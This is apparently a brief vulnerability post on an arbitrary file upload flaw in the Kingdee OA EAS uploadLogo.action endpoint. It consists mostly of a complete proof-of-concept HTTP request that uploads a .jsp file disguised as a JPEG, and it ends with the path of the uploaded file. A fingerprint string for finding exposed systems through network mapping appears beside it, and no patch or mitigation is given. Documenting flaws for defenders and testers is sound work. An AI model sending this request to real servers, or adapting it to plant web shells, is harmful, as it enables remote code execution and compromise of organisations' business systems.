Kingdee Oa Eas System Uploadlogo Action Vulnerability For Uploading Any File
Kingdee Oa Eas System Uploadlogo Action Vulnerability For Uploading Any File
Kingdee OA EAS system uploadLogo.action Any file upload vulnerability
Vulnerability Description
Kingdee EAS and EAS Cloud are an enterprise-level application software suite launched by Kingdee Software, which aims to help enterprises achieve comprehensive management and business process optimization.
Vulnerability Impact
Kingdee OA EAS system
Network surveying and mapping
“/easportal/”
Vulnerability reappears
Login page
Verify POC
POST /plt_portal/setting/uploadLogo.action HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarycxkT8bV6WLIUzm2p
------WebKitFormBoundarycxkT8bV6WLIUzm2p
Content-Disposition: form-data; name="chooseLanguage_top"
ch
------WebKitFormBoundarycxkT8bV6WLIUzm2p
Content-Disposition: form-data; name="dataCenter"
xx
------WebKitFormBoundarycxkT8bV6WLIUzm2p
Content-Disposition: form-data; name="insId"
------WebKitFormBoundarycxkT8bV6WLIUzm2p
Content-Disposition: form-data; name="type"
top
------WebKitFormBoundarycxkT8bV6WLIUzm2p
Content-Disposition: form-data; name="upload"; filename="text.jsp"
Content-Type: image/jpeg
Test
------WebKitFormBoundarycxkT8bV6WLIUzm2p--
/portal/res/file/upload/xxx.jsp
This post is licensed under CC BY 4.0 by the author.